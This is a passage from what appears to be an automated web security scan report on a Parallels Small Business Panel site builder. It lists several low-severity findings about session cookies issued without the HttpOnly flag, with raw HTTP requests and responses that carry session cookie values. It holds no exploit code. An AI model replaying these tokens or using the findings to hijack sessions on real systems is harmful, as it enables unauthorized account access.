<tr><td height="50%" class="sb-overview-title" align="center" valign="top"><img style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/over_design.gif"></td></tr>
<tr><td height="20%" align="center" valign="top"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><div style="width: 0; height: 80px;"><span></span></div></td>
<td align="center" valign="top" style="vertical-align: top; padding: 5px;">
<span class="sb-overview-title">Design</span><div style="width: 0; height: 10px;"><span></span></div>
<span class="sb-overview-bg sb-text">Select the design for your site</span>
</td>
</tr></table></td></tr>
<tr><td height="15%"></td></tr>
</table></td>
<td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%; background-image: url('/skins/WinXPReloadedCompact/images/over_right_line.gif'); background-repeat: repeat-y;"><tr><td><img src="/skins/WinXPReloadedCompact/images/over_right_arrow.gif" style="border-width:0px;"></td></tr></table></td>
</tr>
<tr>
<td style="vertical-align: bottom;"><img src="/skins/WinXPReloadedCompact/images/over_left_bottom_corner.gif" style="border-width:0px;height:7px;width:10px;"></td>
<td style="background-repeat: repeat-x; background-position: bottom right;" background="/skins/WinXPReloadedCompact/images/over_bottom_line.gif"><div style="width: 0; height: 1px;"><span></span></div></td>
<td style="vertical-align: bottom;"><img src="/skins/WinXPReloadedCompact/images/over_right_bottom_corner.gif" style="border-width:0px;height:7px;width:10px;"></td>
</tr>
</table></td></tr></table></td>
<td align="center" style="border-width:0px;width:20%;"><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;height:100%;width:100%;border-collapse:collapse;"><tr><td align="center" style="border-width:0px;width:20%;" border="0"><table class="sb-overview-table-inside" style="cursor: pointer; cursor: hand; height: 100%;" cellspacing="0" cellpadding="0" width="100%" border="0" onclick="sbNavigationObject.go('/Wizard/Pages');">
<tr>
<td style="width: 10px; height: 7px; vertical-align: top;"><img src="/skins/WinXPReloadedCompact/images/over_left_top_corner.gif" style="border-width:1px;height:7px;"></td>
<td style="background-repeat: repeat-x; background-position: top right;" background="/skins/WinXPReloadedCompact/images/over_top_line.gif"><div style="width: 130px; height: 1px;"><span></span></div></td>
<td style="width: 10px; vertical-align: top;"><img src="/skins/WinXPReloadedCompact/images/over_right_top_corner.gif" style="border-width:0px;height:7px;"></td>
</tr>
<tr>
<td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%; background-image: url('/skins/WinXPReloadedCompact/images/over_left_line.gif'); background-repeat: repeat-y;"><tr><td><img src="/skins/WinXPReloadedCompact/images/over_left_arrow.gif" style="border-width:0px;"></td></tr></table></td>
<td height="100%" valign="middle" style="background-repeat: no-repeat; background-position: center left;" background="/skins/WinXPReloadedCompact/images/over_left_end_arrow.gif"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;">
<tr><td height="15%"></td></tr>
<tr><td height="50%" class="sb-overview-title" align="center" valign="top"><img style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/over_pages.gif"></td></tr>
<tr><td height="20%" align="center" valign="top"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><div style="width: 0; height: 80px;"><span></span></div></td>
<td align="center" valign="top" style="vertical-align: top; padding: 5px;">
<span class="sb-overview-title">Pages</span><div style="width: 0; height: 10px;"><span></span></div>
<span class="sb-overview-bg sb-text">Create and edit the structure of your site</span>
</td>
</tr></table></td></tr>
<tr><td height="15%"></td></tr>
</table></td>
<td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%; background-image: url('/skins/WinXPReloadedCompact/images/over_right_line.gif'); background-repeat: repeat-y;"><tr><td><img src="/skins/WinXPReloadedCompact/images/over_right_arrow.gif" style="border-width:0px;"></td></tr></table></td>
</tr>
<tr>
<td style="vertical-align: bottom;"><img src="/skins/WinXPReloadedCompact/images/over_left_bottom_corner.gif" style="border-width:0px;height:7px;width:10px;"></td>
<td style="background-repeat: repeat-x; background-position: bottom right;" background="/skins/WinXPReloadedCompact/images/over_bottom_line.gif"><div style="width: 0; height: 1px;"><span></span></div></td>
<td style="vertical-align: bottom;"><img src="/skins/WinXPReloadedCompact/images/over_right_bottom_corner.gif" style="border-width:0px;height:7px;width:10px;"></td>
</tr>
</table></td></tr></table></td>
<td align="center" style="border-width:0px;width:20%;"><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;height:100%;width:100%;border-collapse:collapse;"><tr><td align="center" style="border-width:0px;width:20%;" border="0"><table class="sb-overview-table-inside" style="cursor: pointer; cursor: hand; height: 100%;" cellspacing="0" cellpadding="0" width="100%" border="0" onclick="sbNavigationObject.go('/Wizard/Edit');">
<tr>
<td style="width: 10px; height: 7px; vertical-align: top;"><img src="/skins/WinXPReloadedCompact/images/over_left_top_corner.gif" style="border-width:1px;height:7px;"></td>
<td style="background-repeat: repeat-x; background-position: top right;" background="/skins/WinXPReloadedCompact/images/over_top_line.gif"><div style="width: 130px; height: 1px;"><span></span></div></td>
<td style="width: 10px; vertical-align: top;"><img src="/skins/WinXPReloadedCompact/images/over_right_top_corner.gif" style="border-width:0px;height:7px;"></td>
</tr>
<tr>
<td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%; background-image: url('/skins/WinXPReloadedCompact/images/over_left_line.gif'); background-repeat: repeat-y;"><tr><td><img src="/skins/WinXPReloadedCompact/images/over_left_arrow.gif" style="border-width:0px;"></td></tr></table></td>
<td height="100%" valign="middle" style="background-repeat: no-repeat; background-position: center left;" background="/skins/WinXPReloadedCompact/images/over_left_end_arrow.gif"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;">
<tr><td height="15%"></td></tr>
<tr><td height="50%" class="sb-overview-title" align="center" valign="top"><img style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/over_edit.gif"></td></tr>
<tr><td height="20%" align="center" valign="top"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><div style="width: 0; height: 80px;"><span></span></div></td>
<td align="center" valign="top" style="vertical-align: top; padding: 5px;">
<span class="sb-overview-title">Edit</span><div style="width: 0; height: 10px;"><span></span></div>
<span class="sb-overview-bg sb-text">Create and edit the content of your site</span>
</td>
</tr></table></td></tr>
<tr><td height="15%"></td></tr>
</table></td>
<td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%; background-image: url('/skins/WinXPReloadedCompact/images/over_right_line.gif'); background-repeat: repeat-y;"><tr><td><img src="/skins/WinXPReloadedCompact/images/over_right_arrow.gif" style="border-width:0px;"></td></tr></table></td>
</tr>
<tr>
<td style="vertical-align: bottom;"><img src="/skins/WinXPReloadedCompact/images/over_left_bottom_corner.gif" style="border-width:0px;height:7px;width:10px;"></td>
<td style="background-repeat: repeat-x; background-position: bottom right;" background="/skins/WinXPReloadedCompact/images/over_bottom_line.gif"><div style="width: 0; height: 1px;"><span></span></div></td>
<td style="vertical-align: bottom;"><img src="/skins/WinXPReloadedCompact/images/over_right_bottom_corner.gif" style="border-width:0px;height:7px;width:10px;"></td>
</tr>
</table></td></tr></table></td>
<td align="center" style="border-width:0px;width:20%;"><table cellspacing="0" cellpadding="0" border="0" style="border-width:0px;height:100%;width:100%;border-collapse:collapse;"><tr><td align="center" style="border-width:0px;width:20%;" border="0"><table class="sb-overview-table-inside" style="cursor: pointer; cursor: hand; height: 100%;" cellspacing="0" cellpadding="0" width="100%" border="0" onclick="sbNavigationObject.go('/Wizard/Publish');">
<tr>
<td style="width: 10px; height: 7px; vertical-align: top;"><img src="/skins/WinXPReloadedCompact/images/over_left_top_corner.gif" style="border-width:1px;height:7px;"></td>
<td style="background-repeat: repeat-x; background-position: top right;" background="/skins/WinXPReloadedCompact/images/over_top_line.gif"><div style="width: 130px; height: 1px;"><span></span></div></td>
<td style="width: 10px; vertical-align: top;"><img src="/skins/WinXPReloadedCompact/images/over_right_top_corner.gif" style="border-width:0px;height:7px;"></td>
</tr>
<tr>
<td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%; background-image: url('/skins/WinXPReloadedCompact/images/over_left_line.gif'); background-repeat: repeat-y;"><tr><td><img src="/skins/WinXPReloadedCompact/images/over_left_arrow.gif" style="border-width:0px;"></td></tr></table></td>
<td height="100%" valign="middle" style="background-repeat: no-repeat; background-position: center left;" background="/skins/WinXPReloadedCompact/images/over_left_end_arrow.gif"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;">
<tr><td height="15%"></td></tr>
<tr><td height="50%" class="sb-overview-title" align="center" valign="top"><img style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/over_publish.gif"></td></tr>
<tr><td height="20%" align="center" valign="top"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><div style="width: 0; height: 80px;"><span></span></div></td>
<td align="center" valign="top" style="vertical-align: top; padding: 5px;">
<span class="sb-overview-title">Publish</span><div style="width: 0; height: 10px;"><span></span></div>
<span class="sb-overview-bg sb-text">Publish your site to a server</span>
</td>
</tr></table></td></tr>
<tr><td height="15%"></td></tr>
</table></td>
<td><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%; background-image: url('/skins/WinXPReloadedCompact/images/over_right_line.gif'); background-repeat: repeat-y;"><tr><td><img src="/skins/WinXPReloadedCompact/images/empty.gif" style="border-width:0px;"></td></tr></table></td>
</tr>
<tr>
<td style="vertical-align: bottom;"><img src="/skins/WinXPReloadedCompact/images/over_left_bottom_corner.gif" style="border-width:0px;height:7px;width:10px;"></td>
<td style="background-repeat: repeat-x; background-position: bottom right;" background="/skins/WinXPReloadedCompact/images/over_bottom_line.gif"><div style="width: 0; height: 1px;"><span></span></div></td>
<td style="vertical-align: bottom;"><img src="/skins/WinXPReloadedCompact/images/over_right_bottom_corner.gif" style="border-width:0px;height:7px;width:10px;"></td>
</tr>
</table></td></tr></table></td>
</tr></table></td></tr>
<tr><td style="vertical-align: top; padding: 0px 15px 16px 15px"><table class="sb-overview-table" cellpadding="6" cellspacing="0" style="width:100%"><tr><td><table class="sb-overview-table-inside" style="width: 100%;" cellspacing="0" cellpadding="0" border="0"><tr><td style="height: 28px;padding-left:3px">
<input type="checkbox" onchange="sbApplyChangesObject.registerChange();sbApplyChangesObject.registerForcedSaving();" value="1" name="dontShowOverviewPage" id="dontShowOverviewPage"><label for="dontShowOverviewPage">Do not show this page again</label>
</td></tr></table></td></tr></table></td></tr>
</table></td></tr>
<tr id="TRFooter"><td colspan="2"><table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-footer-container"><tr><td class="sb-footer"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;"><tr>
<td><table border="0" cellpadding="0" cellspacing="5" style="height: 100%; padding: 5px 0;"><tr><td class="sb-footer-text" style="white-space: nowrap;padding-left: 15px;">
                                       .... Copyright 2004-2009 Parallels All Rights Reserved.</td></tr></table></td>
<td align="right" style="padding-right: 10px;"><table cellpadding="0" cellspacing="0"><tr><td><table cellpadding="0" cellspacing="0" border="0" value="Forward" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Start');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_start_l.gif" border="0"></td>
<td background="/skins/WinXPReloadedCompact/images/go_bg.gif" style="padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_next_bullet.gif" border="0"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Start</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_r.gif" border="0"></td>
</tr></table></td></tr></table></td>
</tr></table></td></tr></table></td></tr>
</table></form>
</body>
</html>

3.6. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Design  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Design

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Design HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:59:37 GMT
Connection: close


3.7. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit?siteId=78806f0057ebcbb04597bd12795bd6a6 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:8880/domains/sitebuilder_edit.php?dom_id=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Wizard/Edit/Html?currentPageId=q485ez4jvyq
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:05 GMT
Connection: close


3.8. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/ HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Wizard/Edit/Html?currentPageId=q485ez4jvyq
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:59:16 GMT
Connection: close


3.9. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Edit/Html?currentPageId=q485ez4jvyq HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://vulnerarable.plesk.smb.10.2.0.site:8880/domains/sitebuilder_edit.php?dom_id=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US; SessionID=42b54cb11fc3aedbd

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="/skins/common.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/WinXPReloadedCompact/style.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/style_ext.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link rel="shortcut icon" href="/favicon.ico?5.0.0.2009110318">
<script type="text/javascript" src="/js/externals/prototype.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/externals/scriptaculous/scriptaculous.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Console.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/util.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/preloader.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Cookie.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/common.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/validator.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/SbAjaxRequest.js?5.0.0.2009110318"></script><style type="text/css">img{ behavior:url('/images/pngbehavior.htc?5.0.0.2009110318'); }</style>
<title>Edit -
       Parallels Small Business Panel</title>
</head>
<body onload="ProcessOnloadActions();">
<script type="text/javascript">
                   if ('1' == '') {
                       Sb.Console.enable();

                       
                   }
                                   
                   Sb.Cookie.set('testCookie', 'test', '', '/');

                   if ('test' != Sb.Cookie.get('testCookie')) {
                       document.location.href = "/NoCookies";
                   }

                   // define global variables
                   sbSkinPath = '/skins/WinXPReloadedCompact';
                   sbBrowserEngine = 'MSIE';
                   sbBaseUrl = '';
                   sbVersion = '5.0.0';
                   sbBuild = '2009110318';
               </script><script src="/js/locale.js?5.0.0.2009110318" type="text/javascript"></script><script type="text/javascript" language="javascript">
               SbAppendLocaleKey('HIDE-SITE-MAP', 'Hide Site Map');
           
               SbAppendLocaleKey('SHOW-SITE-MAP', 'Show Site Map');
           
               SbAppendLocaleKey('EMPTY-PAGE-TITLE', 'Please provide the page title.');
           
               SbAppendLocaleKey('EMPTY-PAGE-FILE-NAME', 'Please provide a page file name.');
           
               SbAppendLocaleKey('INVALID-PAGE-FILE-NAME', 'Page file name can contain only Latin characters, digits, dashes, and underscores.');
           
               SbAppendLocaleKey('DUPLICATE-PAGE-FILE-NAME', 'Page file name must be unique within each site structure. Also, you cannot name a page \'index\' because it is a reserved name.');
           
               SbAppendLocaleKey('HIDE-AVAILABLE-MODULES', 'Hide Modules');
           
               SbAppendLocaleKey('SHOW-AVAILABLE-MODULES', 'Show Modules');
           
               SbAppendLocaleKey('WYSIWYG-CUSTOM-LINKS', 'Custom links');
           
               SbAppendLocaleKey('WYSIWYG-CUSTOM-LINKS-TOOLTIP', '[[Wizard/Edit/Html_:_wysiwygCustomLinksTooltip]]');
           
               SbAppendLocaleKey('cropImage', 'Crop Image');
           
               SbAppendLocaleKey('PREVIEW-POPUP-BLOCKED', 'The site preview window was blocked by your browser. To preview the site, please allow pop-up windows for this domain.');
           
               SbAppendLocaleKey('CONTENT-MODIFIED', 'Modified');
           
               SbAppendLocaleKey('AJAX-REQUEST-LOADING', 'Loading...');
           
               SbAppendLocaleKey('AJAX-REQUEST-WAIT', 'Please wait.');
           </script><div id="fullScreenDiv" style="position:absolute; background: #ffffff; filter:alpha(opacity=0); opacity: 0;"></div>
<div id="disablerDiv" style="display: none; filter:alpha(opacity=40); background-color: #FFFFFF; opacity: 0.4;"></div>
<table id="SB_loader_table" cellpadding="0" cellspacing="0" border="0" width="100%" height="100%" style="display:none;z-index:1098;position:absolute;"><tr><td id="SB_loader_td" style="filter:alpha(opacity=40);background-color:#ffffff;-moz-opacity:0.40;"></td></tr></table>
<div id="DIV_DESKTOP" style="width:1%;height:1%;display:none;text-align:center;position:absolute;left:0px;top:0px;z-index:1001;"></div>
<div id="loader" style="height:56px;width:320px;display:none;position:absolute;left:0px;top:0px;z-index:1100;"><table border="0" cellspacing="3" cellpadding="3" width="100%" height="100%" class="sb-preloader-table"><tr>
<td align="center" valign="middle" width="15%"><img id="ImagePreloader" src="/skins/WinXPReloadedCompact/images/loading.gif" style="border-width:0px;"></td>
<td align="left" valign="middle"><span id="LabelPreloader"><strong>Please wait.</strong><br><strong>Loading...</strong></span></td>
</tr></table></div>
<iframe src="/blank.html" id="SB_loader_iframe" name="SB_loader_iframe" frameborder="0" scrolling="no" style="border-width:0;display:none;z-index:1099;position:absolute;height:56px;width:320px;"></iframe><script type="text/javascript" language="javascript"><!--
               var sbPreloader = new SbPreloader();
               
                       sbPreloader.show();
                   
           //--></script><script type="text/javascript">
                   sb_status = null;
               </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="SbApplyChangesBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="SbApplyChanges" style="width:300px; height:145px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="SbApplyChangesHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="SbApplyChangesTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Apply Changes</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbApplyChangesObject.hide();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="Close dialog" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><table width="80%" cellspacing="0" cellpadding="0" border="0" align="center">
<tr><td colspan="3" style="padding-bottom:10px; padding-left:10px;"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/applychanges.gif" border="0"></td>
<td class="sb-text" style="padding-left:30px;">Apply changes?</td>
</tr></table></td></tr>
<tr>
<td align="center" width="33%" style="padding-right:15px;"><table align="center" onclick="return sbApplyChangesObject.yes(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Yes</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="34%"><table align="center" onclick="return sbApplyChangesObject.no(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">No</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="33%" style="padding-left:15px;"><table align="center" onclick="sbApplyChangesObject.cancel(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Cancel</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr>
</table></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('SbApplyChanges');
       </script><script type="text/javascript" language="javascript" src="/js/apply_changes.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"><!--
               sbApplyChangesObject = new SB_ApplyChanges('SbApplyChanges');
           //--></script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="StatusDetailedBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="StatusDetailed" style="width: 750px; height: 370px; display: none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="StatusDetailedHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusDetailedTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Detailed status messages</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sb_status.hideDetails();return false;"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><div>
<div style="margin-bottom: 7px;"><table cellspacing="1" border="0" style="width: 720px;" align="center"><tr>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse;"><tr>
<td valign="middle" class="sb-text" style="padding-right: 5px;">View</td>
<td valign="middle" style="padding-right: 5px;"><select class="sb-text" onchange="sb_status.filterDetails(this.value)"><option value="0">All messages</option>
<option value="1">Information</option>
<option value="2">Errors</option>
<option value="3">Warnings</option></select></td>
</tr></table></td>
<td align="right"><table align="right" onclick="sb_status.clearDetails(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Clear</td>
